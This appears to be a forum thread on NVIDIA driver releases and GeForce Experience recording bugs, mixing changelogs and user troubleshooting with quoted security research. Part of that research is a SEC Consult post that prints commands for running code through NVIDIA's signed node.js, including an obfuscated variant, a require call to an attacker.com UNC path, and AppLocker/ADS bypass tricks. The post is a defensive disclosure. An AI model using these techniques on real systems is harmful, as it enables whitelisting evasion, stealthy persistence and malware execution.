Having this bug with RESIDENT EVIL 7 when recording with GFE 1080p@60FPS @20mbps.
SPOILERS!
Screen freezes after a few secs, frozen images, sometimes the video continues depending of where the timer is at, but then NO SOUND.
I tried uninstalling drivers + GFE and reinstall to NO LUCK
ASUS X570 TUF GAMING PLUS, 32GB DDR4@2666 ,RYZEN 5800X3D (NO OC),GIGABYTE RTX 4070 Super GAMING OC, Western Digital Blue 4TB 5400RPM + SAMSUNG 860 EVO 500+1TB GB SSDs , OEM SATA DVD 22xNoctua NH-D15 Chromax Black, BenQ XL2420T Case: Be Quiet! DARK BASE PRO 901. PSU CORSAIR RM1200 SHIFT
@DV2 let me guess, your using that Java crap 3.0 GFE version ...or theirs new even more shit chromium GFE 3.4.xxx BETA with Alt+z Share mode ...
all that need constant net access
The last good working GFE was v2.8.1.21 , totally off line , works with the -shadowplay' command for offline capture and menu ... and you can update your version if you need it with new features when you manually copy its dll files ( for useless share menu , that you dont need)
@DV2 let me guess, your using that Java crap 3.0 GFE version ...or theirs new even more shit chromium GFE 3.4.xxx BETA with Alt+z Share mode ...
all that need constant net access
The last good working GFE was v2.8.1.21 , totally off line , works with the -shadowplay' command for offline capture and menu ... and you can update your version if you need it with new features when you manually copy its dll files ( for useless share menu , that you dont need)
@DV2 let me guess, your using that Java crap 3.0 GFE version ...or theirs new even more shit chromium GFE 3.4.xxx BETA with Alt+z Share mode ...
all that need constant net access
The last good working GFE was v2.8.1.21 , totally off line , works with the -shadowplay' command for offline capture and menu ... and you can update your version if you need it with new features when you manually copy its dll files ( for useless share menu , that you dont need)
it works as it should , captures all ... no hick ups
... all GFE after that are shit ...
Really? so fresh install of drivers ONLY, then install that older gfe and good to go? Is it still used via a front end for key assignments etc
just install all your Nvidia drivers in Advanced mode with GFE ticked off (Nvidia drivers un-install all GFE by default if you pick this option ... or you can delete the stub in the drivers) ... then install this v2.8.1.21
and then add to your desktop Shortcut -shadowplay (example "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\GFExperience.exe" -shadowplay' ) , this will open shadowplay in offline mode ... if you need the features of new GFE you have to copy manually all the new DLL from the new drivers (i , have checked all of those and they did not changed a thing ... all things they now add is Shield streaming support and Share menu when you press ALT+Z )
and yes , you will still have a front end , but you have to open it with that prepared shortcut
your right , theirs GUI is awful ... but you can also use DXtroy and with it hijack the Nvidia capture ... making Dxtory the GUI and capturing the screen using Nvidia stream server drivers that Shadowplay uses
Game Ready
Provides the optimal gaming experience for Sniper Elite 4, For Honor, and Halo Wars 2.
New Features
Video SDK 8.0
.High-bit-depth (10/12-bit) decoding (VP9/HEVC)
.OpenGL input surface support for encoder
.Weighted Prediction
.H.264 ME-only mode enhancements
Application SLI Profiles
No SLI profiles were added with this version.
Changes and Fixed Issues in Version 378.66
[Surround]: Surround cannot be enabled on the XGPU. [200236703]
[G-Sync]: With G-Sync and V-Sync both enabled, there is a long delay when switching a game from full-screen mode to windowed mode.[1867557]
[Second Life 64-bit]: World view is tinted blue after disabling Advanced Lighting Model. [200274562]
[The Division]: Shadows flicker after enabling PCSS. [1867573]
[Kepler GPUs][Battlefield 1]: There is flickering in the game when using TAA. [1865681]
[SLI][Battlefield Day28 Patch]: The menu text becomes jittery with SLI is enabled. [1837721]
[SLI][Surround][GeForce GTX 1080]: The system crashes when launching games in SLI Surround using HDMI 2.0 connections. [1834142]
[GeForce GTX 1080][Heroes of Storm]: The game crashes when launched. [200274793]
[GeForce 860M][Notebook]: Direct X games crash. [1868454]
[Minecraft]: Java SE Binary crashes pointing to nvinitx.dll. [200274582]
[GeForce GTX 980 Ti]: The driver is unable to detect multiple TV models. [1788948]
Open Issues in Version 378.66 WHQL
Windows 10 Issues
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GeForce GTX 980][CUDA]: Driver error occurs when trying to compute with GPUGrid CUDA application.[1869402]
[Surround][DirectX 11 apps] Only red and blue colors are visible when playing videos at resolutions >= 1080P on one surround monitor.[200273552]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently crashes if intro video is skipped and instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading hangs in Gears of War 4. [1826307]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync
enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
(In regards to SLI the earlier 378.xx drivers already added a SLI profile for Sniper Elite V4 for DX11)
Just installed the new "378.66" drivers. I had to uninstall the prior ones due to blue screening. Hopefully they fixed what was ever broken in prior ones and these work. We shall see.
News and updates from the Project Zero team at Google
Tuesday, February 14, 2017
Attacking the Windows NVIDIA Driver
Posted by Oliver Chang
Modern graphic drivers are complicated and provide a large promising attack surface for EoPs and sandbox escapes from processes that have access to the GPU (e.g. the Chrome GPU process). In this blog post we’ll take a look at attacking the NVIDIA kernel mode Windows drivers, and a few of the bugs that I found. I did this research as part of a 20% project with Project Zero, during which a total of 16 vulnerabilities were discovered...........
Kernel WDDM interfaces
The kernel mode component of a graphics driver is referred to as the display miniport driver. Microsoft’s documentation has a nice diagram that summarises the relationship between the various components:
In the DriverEntry() for display miniport drivers, a DRIVER_INITIALIZATION_DATA structure is populated with callbacks to the vendor implementations of functions that actually interact with the hardware, which is passed to dxgkrnl.sys (DirectX subsystem) via DxgkInitialize(). These callbacks can either be called by the DirectX kernel subsystem, or in some cases get called directly from user mode code.
DxgkDdiEscape
A well known entry point for potential vulnerabilities here is the DxgkDdiEscape interface. This can be called straight from user mode, and accepts arbitrary data that is parsed and handled in a vendor specific way (essentially an IOCTL). For the rest of this post, we’ll use the term “escape” to denote a particular command that’s supported by the DxgkDdiEscape function.
NVIDIA has a whopping 400~ escapes here at time of writing, so this was where I spent most of my time (the necessity of many of these being in the kernel is questionable):
// (names of these structs are made up by me)
// Represents a group of escape codes
struct NvEscapeRecord {
DWORD action_num;
DWORD expected_magic;
void *handler_func;
NvEscapeRecordInfo *info;
_QWORD num_codes;
};
...
Quote:
Conclusion
Given the large attack surface exposed by graphics drivers in the kernel and the generally lower quality of third party code, it appears to be a very rich target for finding sandbox escapes and EoP vulnerabilities. GPU vendors should try to limit this by moving as much attack surface as they can out of the kernel.
Hey, i think i've found the solution about the above YT bugs when uploading..
TL;DR. Uppin processing of vids to YT via FIREFOX. Freezes when uploading a 6min vid for a nearly 2h upload in the end. Vid ends up being frozen and buggy OMGWTFBBQ (Hey, long time not seeing that!)
Solution: Temporal jump to Google Chrome, login there and upload the stuff. Checking the process of a 6min vid tooked 6mins to upload and 6mins to process.. The vids works CORRECTLY LATER ON BOTH FIREFOX AND GCHROME
Issue then?. Firefox and YT. NOT GFE's FAULT!
There, i'm done *Drops the mic*
ASUS X570 TUF GAMING PLUS, 32GB DDR4@2666 ,RYZEN 5800X3D (NO OC),GIGABYTE RTX 4070 Super GAMING OC, Western Digital Blue 4TB 5400RPM + SAMSUNG 860 EVO 500+1TB GB SSDs , OEM SATA DVD 22xNoctua NH-D15 Chromax Black, BenQ XL2420T Case: Be Quiet! DARK BASE PRO 901. PSU CORSAIR RM1200 SHIFT
- Fixed driver installation errors for laptops with GeForce GTX 1050 and 1050 ti GPUs.
- Fixed crash in Minecraft and some other Java-based titles
- Resolved 'Debug Mode' as default option on Pascal based GPUs
Related (sort of) after the recent announcements, take it with a grain of green salt
Quote:
NVIDIA also revealed an upcoming Game Ready Driver optimized for DirectX 12 games.
The company refined code in the driver and worked side by side with game developers to deliver performance increases of up to 16 percent on average across a variety of DirectX 12 games, such as Ashes of the Singularity, Gears of War 4, Hitman, Rise of the Tomb Raider and Tom Clancy's The Division.
EDIT:
Game Ready - Ghost Recon: Wildlands
Gaming Technology - DX12 optimizations
New Features - 1080Ti support.
SLI Profiles - Deus Ex: Mankind Divided, Titanfall 2, Tom Clancy's The Division
Quote:
Changes and Fixed Issues in Version 378.78
The following sections list the important changes and the most common issues resolved in this version. This list is only a subset of the total number of changes made in this driver version. The NVIDIA bug number is provided for reference.
[Discord]: The GFE FPS counter appears in the application. [200281089]
[GeForce 1050 Ti][Notebook]: Blue-screen crash occurs on some notebook platforms. [1877803]
[GeForce GTX 980 Ti][PhysX]: PhysX uses the CPU when Optimize for Compute Performance setting is OFF, resulting in a drop in performance. [1871405]
[GeForce GTX 980][CUDA]: Driver error occurs when trying to compute with GPUGrid CUDA application.[1869402]
[GeForce GTX 980 Ti][OpenCL]: Driver error occurs when trying to compute PrimeGrid Genefer OpenCL tool. [1867576]
[GeForce Experience]: Driver installation fails when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[GeForce GTX 1080 Ti][Sid Meirie's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu afte skippingthe cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wild lands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with observed with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently crashes if intro video is skipped and instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading hangs in Gears of War 4. [1826307]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
Game Ready
Provides the optimal gaming experience for Mass Effect: Andromeda and Rock Band VR.
New Features
Added support for Dolby Vision for games.
Application SLI Profiles
Added or updated the following SLI profiles:
Dead Rising 4 - updated
Deus Ex: Breach - updated
Mass Effect: Andromeda - added SLI profile
3D Vision Profiles
Added or updated the following 3DV profiles:
Halo Wars 2 - Not recommended
3D Compatibility Mode Profiles
These games must be run in DirectX 10/11 mode to see improvements and are not compatible with 3D Vision Surround mode. See “3D Compatibility Mode” on page 11 for more information.
Added or updated the following compatibility mode profiles:
Dreadnought - Excellent
Quote:
Open Issues in Version 378.92 WHQL
As with every released driver, version 378.92 WHQL of the Release 378 driver has open issues and enhancement requests associated with it.
This section includes lists of issues that are either not fixed or not implemented in this version. Some problems listed may not have been thoroughly investigated and, in fact, may not be NVIDIA issues. Others may have workaround solutions.
Windows 10 Issues
[GeForce Experience]: Driver installation fails when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meirie's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu afte skippingthe cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wild lands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently crashes if intro video is skipped and instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading hangs in Gears of War 4. [1826307]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
This is a message i sent to Nvidia related to their 3.4 version of GFE. Actually using 3.3 with autoupdate disabled (Now their official site shows 3.4 for DL and i-don't-want-that...)
--
"After a fresh format/install of Windows 7, i went and DL'd the newest Nvidia drivers from today (or whenever). Installed everything, even GFE 3.4, except the 2 3D Vision options.
Whenever i reboot the PC and go to GFE, i go to the Settings icon at the top right and i see that "Share" is already on!... However if i press "Configuration" ... It does NOTHING...Only the flashy FX.
I turn off Share, but when i try to re-open it it says "an error has been produced. Try rebooting your system" or something. So i do!....AND THE PROBLEM PERSISTS!..
Aka I CAN'T RECORD ANYTHING!!
Any solution,please?...
And yes, i've uninstalled all the Nvidia stuff, rebooted everytime when asked, then reinstalled with the GFE checked. Same issue. Don't want to get the previous version since, i think, because of that it made W7 load 1-2minutes ON AN SSD since POST!
What i meant is that i had 3.3 and whenever it wanted to update to 3.4 it threw me install errors, and once it finally got in, the W7 issues happened... And i don't want it to happen AGAIN, NOT AT ALL ><"
ASUS X570 TUF GAMING PLUS, 32GB DDR4@2666 ,RYZEN 5800X3D (NO OC),GIGABYTE RTX 4070 Super GAMING OC, Western Digital Blue 4TB 5400RPM + SAMSUNG 860 EVO 500+1TB GB SSDs , OEM SATA DVD 22xNoctua NH-D15 Chromax Black, BenQ XL2420T Case: Be Quiet! DARK BASE PRO 901. PSU CORSAIR RM1200 SHIFT
ASUS X570 TUF GAMING PLUS, 32GB DDR4@2666 ,RYZEN 5800X3D (NO OC),GIGABYTE RTX 4070 Super GAMING OC, Western Digital Blue 4TB 5400RPM + SAMSUNG 860 EVO 500+1TB GB SSDs , OEM SATA DVD 22xNoctua NH-D15 Chromax Black, BenQ XL2420T Case: Be Quiet! DARK BASE PRO 901. PSU CORSAIR RM1200 SHIFT
Game Ready - Quake Champions: Closed Beta
Product Support - Nvidia Titan Xp
Features:
Added support for Windows 10 Creators Update.
Added DTS X and Dolby Atmos support for 5.1.2 speaker configuration.
Added Dolby Vision support for games.
Added NVIDIA Ansel TM support for Snake Pass and Kona.
NVIDIA Control Panel
*Display page: Added the option to override the Windows 10 control of desktop color settings.
*Manage 3D Settings page: Added option to disable self-refresh power-saving feature for G-Sync.
Applies to self-refresh capable notebooks using Pascal-based GPUs with G-Sync enabled.
SLI profiles - Descent Underground (updated)
Changes and fixes
[XSplit][DirectX 12 games such as Rise of the Tomb Raider]: Games experience poor performance.[1882697]
[GeForce GTX TITAN X][SLI][Battlefield 1- XP1 Update]: Shimmering occurs on grass and trees with SLI and in-game TAA enabled. [200289721]
[GeForce GTX 1070][Serious Sam HD]: Heavy flickering occurs in the game with V-sync enabled. [1881405]
[GeForce GTX 980 Ti]: The GPU occasionally gets stuck in a low power state after pressing Alt-Tab while playing a game. [1832415]
Open issues Windows 10
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meirie's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GM204] Quantum Break window either remains blank or freezes in game scene in windowed mode. [1804910]
Surround Display icon disappears after rotate mode is set to portrait. [200201040]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
[GeForce GTX Titan X][Ansel][Ghost Recon Wild lands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading may hang in Gears of War 4. [1826307]
[367.77, WDDM 2.1] Driver install/overinstall requires a reboot. [1757931]
[SLI, GP104] Installer prompts for a reboot during express overinstall of 372.69 driver on 372.54. [200231806]
Windows 8.1 / Windows 8
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
News from SEC Consult's experts and 0day research lab.
Thursday, April 20, 2017
Abusing NVIDIA's node.js to bypass application whitelisting
Application Whitelisting
Application whitelisting is an important security concept which can be found in many environments during penetration testing. The basic idea is to create a whitelist of allowed applications and after that only allow the execution of applications which can be found in that whitelist. This prevents the execution of dropped malware and increases therefore the overall security of the system and network.
A very commonly used solution for application whitelisting is Microsoft AppLocker. Another concept is to enforce code and script integrity via signatures. This can be achieved on Microsoft Windows 10 or Server 2016 with Microsoft Device Guard.
SEC Consult Vulnerability Lab is doing research in this area since several years, bypass techniques were already presented in 2015 and 2016 at conferences such as CanSecWest, DeepSec, Hacktivity, BSides Vienna and IT-SeCX, see [1].
Knowing these bypass techniques is really important for administrators who maintain such protected environments because special rules must be applied to prevent these attacks.
Other good and recommended sources of known bypass techniques and hardening guides are blog posts from Casey Smith (subtee) [2], Matt Nelson (enigma0x3) [3] and Matt Graeber (mattifestation) [4].
NVIDIA's node.js
During a quick research in a different area, I came across a system which had NVIDIA drivers installed. The following executable gets installed by NVIDIA:
%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
This is a renamed version of node.js (but signed by NVIDIA Corporation) which can be verified via the meta data of the file:
That means we can find node.js on systems with NVIDIA drivers installed. Since this file is already on the system and it has a valid signature, it will be whitelisted by the application whitelisting solution.
Nowadays, the most common technique to bypass application whitelisting is to start PowerShell, because the target code can be passed inside arguments, it has full access to the Windows API, it is a signed binary from Microsoft and it can be found on all newer systems. However, it’s the first binary which gets removed from the whitelist by administrators, PowerShell v5 provides very good logging (attack detection and forensic), Device Guard UMCI (user mode code integrity) places PowerShell in Constrained Language mode and Antivirus solutions monitor malicious invocations of PowerShell.
Nearly similar PowerShell advantages can be achieved by abusing node.js from NVIDIA if the target system has these drivers installed. It can be started in interactive mode which means that scripts can be passed via pipe (payloads are not written to disk). For example, the following command starts the calculator via node.js:
echo require('child_process').exec("calc.exe") | "%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i
From attacker perspective, this opens two possibilities. Either use node.js to directly interact with the Windows API (e.g. to disable application whitelisting or reflectively load an executable into the node.js process to run the malicious binary on behalf of the signed process) or to write the complete malware with node.js. Both options have the advantage, that the running process is signed and therefore bypasses anti-virus systems (reputation-based algorithms) per default.
Writing malware completely in node.js has the great side-affect, that NVIDIA already installs addons with useful functions such as:
However, to get the full power of the Windows API, we can write addons in C/C++ for node.js:
Node.js Addons are dynamically-linked shared objects, written in C or C++, that can be loaded into Node.js using the require() function, and used just as if they were an ordinary Node.js module. They are used primarily to provide an interface between JavaScript running in Node.js and C/C++ libraries. [5]
That means node.js has full access to the Microsoft Windows API and reflective DLL injection is possible.
To load such an Addon the path to the .node file must be passed to the require() function. Node files are normal PE files with some special exported functions, but it’s also possible to load any .dll file with one of the below code lines (an error will be thrown but DllMain gets executed):
A drawback of the reflective DLL injection attack is that it requires one file write because as far as of my knowledge node.js doesn’t support execution of modules from memory (or to directly access the Windows API). It’s therefore required to drop one loader-module to disk, then load this module which acts as a wrapper for the Windows API. Using the dropped module, the script can then access the Windows API and reflectively load any executable / library into the signed node.js process (similar concept to Invoke-ReflectivePEInjection.ps1 from PowerSploit, see [6]).
Please note, that the above approach drops one file to disk, however, this is only a legit node.js module. The real malware can afterwards be loaded via the loader-module from memory and is therefore never written to disk.
The file can be dropped to the following location which is writeable by standard users:
%systemdrive%\ProgramData\NVIDIA Corporation\Downloader\
Overcoming the “issue” of the one-file-write is not trivial. It’s not really a big problem (e.g. the dropped file is not malicious and will not be detected by an AntiVirus solution), however, it could block execution in some cases (e.g. DLL AppLocker rules). Such DLL rules can be bypassed in several ways depending on the used product and configuration. For example, it's possible to abuse AppLocker default rules which allow execution of all files in %windir%/*. Therefore, an attacker can drop his node module to the writeable tasks folder:
%windir%\Tasks\
There are many similar writeable locations inside the %windir% folder. Let's assume that an administrator deny all these writeable locations by adding exclude rules for them. Is the system now secure?
The answer is NO because ADS can be abused. Since we can create a sub-folder in %windir%\tracing, we can create an ADS on the folder (for an explanation on ADS see Alex Inführ's blog post [7]). This can be used to bypass additional restrictions / monitoring rules. Let’s say we drop the following file:
%windir%\Tracing:module.node
All common APIs return as base folder %windir% and not %windir%\tracing which lets the module look like a file from the normal windows folder (however, a normal user does not have write permissions to %windir% ! ).
This trick is already known and was described by James Forshaw on a different subject (unfortunately, I didn’t found the original post from him on it but in general all his posts are highly recommended).
What does that mean? Even if an administrator added additional exclude rules to the default rules to block writeable folders, we can still bypass AppLocker with the ADS.
The following figure shows this (AppLocker is configured to prevent C:\Windows\tracing\* and several other writeable locations):
Here Microsoft's control.exe is used to load the library, however, it can also be loaded via node js (and using the fs-module it's possible to create the ADS).
Another possibility is to overwrite an existing library if application whitelisting was configured only based on paths (because of updates).
Here are some additional methods which I tried to avoide the file write at all:
Some methods which I tried for in-memory files
UNC paths:
require("\\\\attacker.com\\malicious.js")
The code first tries to load the addon via SMB (port 445) and use WebDav (port 80) as fall-back. Since outgoing SMB traffic is in most environments forbidden, it would be good to directly access the data via WebDav (and it’s possible to create a WebDav server in JavaScript with node.js, but then firewall problems can occur). This is possible via paths such as the following two:
A good explanation why these paths work can be found at [8].
However, both path formats are not allowed inside node.js (the code later calls lstat which throws a file not found exception). Moreover, Microsoft internally writes the file to %localappdata%, making the approach useless to achieve file-less exploitation.
Another idea was to abuse named pipes which can be created with node.js code, however, named pipes are not seekable and therefore LoadLibrary() / require() fail.
Calling CreateFile with FILE_ATTRIBUTE_TEMPORARY and FILE_FLAG_DELETE_ON_CLOSE creates in most cases an in-memory file, however, node.js does not provide a way to pass these flags inside JavaScript code.
For people wondering why NVIDIA ships with node.js
At startup, NVIDIA starts a webserver via node.js (providing functionality like the above mentioned webcam control) on a randomized port. To protect against attacks a random secret cookie is created and must be passed to interact with the service. The information about the used port number and cookie value can be extracted from the following file:
For red teamers, it’s the recommended approach to use the fs module from node.js to write a loader addon to disk which gives access to the Microsoft Windows API from JavaScript code. Then JavaScript code can be used to download the (encrypted) payload from the internet and with the Windows API the JavaScript code can reflectively load the payload into its own process space and execute it.
Node.js itself can be started via one of the public known techniques (see our slides at [1]), for example .chm, .lnk, .js, .jse, Java applets, macros, from an exploited process, pass-the-hash and so on.
Standard obfuscation tricks can be used to further hide the invocation. For example, the following code starts calc.exe but tries to further hide:
echo "outdated settings;set colors=";c=['\162\145\161\165\151\162\145','\143\150\151\154\144\137\160\162\157\143\145\163\163','\145\170\145\143','\143\141\154\143'];global[c[0]](c[1])[c[2]](c[3]);"; set specialChars='/*&^"|;"%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i
Such code can be used as persistence mechanism (auto start) because the called binary is signed by NVIDIA and will be considered as safe. Of course, additional anti-monitoring tricks such as ^ or %programdata:~0,-20% can be used somewhere inside the above command line to further prevent detection, however, such code is in my opinion traitorous.
For security consultants, it's recommended to search for node.js binaries (file size > 10 MB and binary contains Node.js strings) during client security audits to identify other vendors which ship node.js to clients.
For blue teamers, it’s recommended to remove the file from the whitelist (if possible) or at least monitor it’s invocation.
Game Ready
Provides the optimal gaming experience for Warhammer 40,000: Dawn of War III, Heroes of the Storm 2.0, Batman: Arkham VR, Rick and Morty: Virtual Rick-ality, and Wilson's Heart.
Quote:
Changes and Fixed Issues in Version 381.89
The following sections list the important changes and the most common issues resolved in this version. This list is only a subset of the total number of changes made in this driver version. The NVIDIA bug number is provided for reference.
[Sniper Elite 3]: The game crashes. [1880113]
[Notebook][eDP panel]: Blue-screen (code 3B) occurs followe by the Recovery screen during software unbundling process. [1900432]
[GeForce GTX 1060]: Blue-screen crash occurs pointing to driver (Nvlddmkm.sys) after the system reboots from sleep mode. [1814559]
GPU idling voltage has increased. [1904229]
Quote:
Windows 10 Issues
[GeForce Experience]: Driver installation may fail when attempting to perform a driver overinstall. To workaround, perform a clean installation.
[SLI][GeForce GTX 1080][Battlefield 1 XP1]: With SLI enabled, corruption appears in the game when switching between full-screen and windowed mode. [1889162]
[GeForce GTX 1080 Ti][Mass Effect: Andromeda]: Random memory errors may occur when playing the game. [1887520]
[GeForce GTX 1080 Ti][Sid Meirie's Civilization VI][G-Sync/SLI/DirectX 12]: Black corruption appears while entering the in-game menu after skipping the cutscene. [200283322]
[GeForce GTX Titan X][Ansel][Ghost Recon Wild lands]: With FXAA enabled from the NVIDIA Control Panel, the application crashes when enabling the in-game Ansel UI. [200283194]
Error code 43 appears in the Device Manager after installing the driver with HDMI display connected. [200283276]
[Pascal][Notebook]: The display remains blank while over installing the driver, requiring a reboot. [200273603]
[GM204, Tom Clancy's The Division Survival DLC] Game crashes, pointing to ntdll.dll when changed to full-screen and to windowed full-screen. [200252894]
[GM204, ShadowPlay] For Honor silently may crash if the intro video is skipped while instant replay is on. [200247313]
[SLI] [GeForce GTX 970M] Level loading may hang in Gears of War 4. [1826307]
[367.77, WDDM 2.1] Driver install/overinstall requires a reboot. [1757931]
[SLI, GP104] Installer prompts for a reboot during express overinstall of 372.69 driver on 372.54. [200231806]
[GM204] Quantum Break window either remains blank or freezes in game scene in windowed mode. [1804910]
Surround Display icon disappears after rotate mode is set to portrait. [200201040]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[347.09, GM204] Blank screen observed on an ASUS Tiled display when system resumes from shutdown or hibernation with Fast boot option enabled from BIOS. [1591053]
Windows 8.1/Windows 8 Issues
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
[Video, Notebook] The NVIDIA Control Panel video color settings have no effect on YouTube flash video playback within Internet Explorer 10. [999485]
Windows 7 Issues
[GeForce GTX 1080] Battlefield 1 hangs when campaign loaded with Fast Sync enabled from the NVIDIA Control Panel. [200254350]
[SLI] Street Fighter V performance drop (pause and play) observed when the game is played at 4K resolution with SLI enabled. [200172046]
[3DVision] While a stereoscopic 3D video with stereoscopic 3D enabled is played, the monitor refresh rate switches to 60 Hz after changing the resolution using the Windows control panel. [1314811]
Game Ready
Provides the optimal gaming experience for Prey, Battlezone, and the Gears of War 4
Multi-GPU Update.
Application SLI Profiles
Added or updated the following SLI profiles:
Sniper: Ghost Warrior 3
Warhammer 40,000: Dawn of War III
3D Vision Profiles
Added or updated the following 3DV profiles:
Warhammer 40,000: Dawn of War III - Not recommended
Quote:
Changes and Fixed Issues in Version 382.05
The following sections list the important changes and the most common issues resolved in this version. This list is only a subset of the total number of changes made in this driver version. The NVIDIA bug number is provided for reference.
[SLI][No Man’s Sky - with The Foundation Update 1.10 patch]: With SLI enabled, there is texture corruption in the game. [200257478]
[SLI][GeForce GTX 670][World of Tanks]: In SLI mode, blue-screen crash occurs when pressing Alt+Tab during the game. [1895732]]
[GeForce GTX 1080 Ti][Gears of War]: After the bootup movies, blue-screen crash occurs pointing to nvlddmkm.sys. [1914184]
The NVIDIA Control Panel in the Windows desktop context menu, as well as the NVIDIA system tray icon, may be absent. [200298863/1906498]
System may hang at a black screen upon cold boot up. [1913854]
